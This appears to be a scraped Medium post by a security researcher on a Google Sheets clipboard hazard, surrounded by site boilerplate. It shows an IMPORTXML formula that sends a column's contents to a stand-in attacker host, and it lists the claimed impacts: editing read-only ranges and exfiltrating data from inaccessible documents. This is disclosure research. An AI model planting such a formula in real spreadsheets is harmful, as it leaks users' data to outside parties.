Clipboard hazard with Google Sheets

=IMPORTXML(CONCAT("https://attacker.controller.path/";CONCATENATE($C:$C)); "/root")
  • #1: modify range(s) of a document where he/she has only read-only access. Full control over the content.
  • #2: exfiltrate data from a document that the attacker has no access to (but knows the ID of the document).

--

--

--

Software developer daytime, security researcher in freetime

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Improve Yahoo Account Security

Hacking for Beginners: From Novice to Ethical Hacker Overnight

{UPDATE} Zombi Tournage : FPS Hack Free Resources Generator

{UPDATE} SDBplay Hack Free Resources Generator

DAYMAXCHAIN

Workaround For The New Local Privilege Elevation Found In The CVE-2021–41379 Patch

Hp Laserjet 4050 Driver Download Windows 7

Walkthrough of My File Server: 3 . This CTF machine is Created by CyberKnight.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Imre Rad

Imre Rad

Software developer daytime, security researcher in freetime

More from Medium

Transfer YouTube Statistics Data to Google Sheets using Google Apps Script

🕷The difficulty of scraping with missing values/tags

How to Extract an Online Shop Website Using Scrapy?

Extracting Data From WhatsApp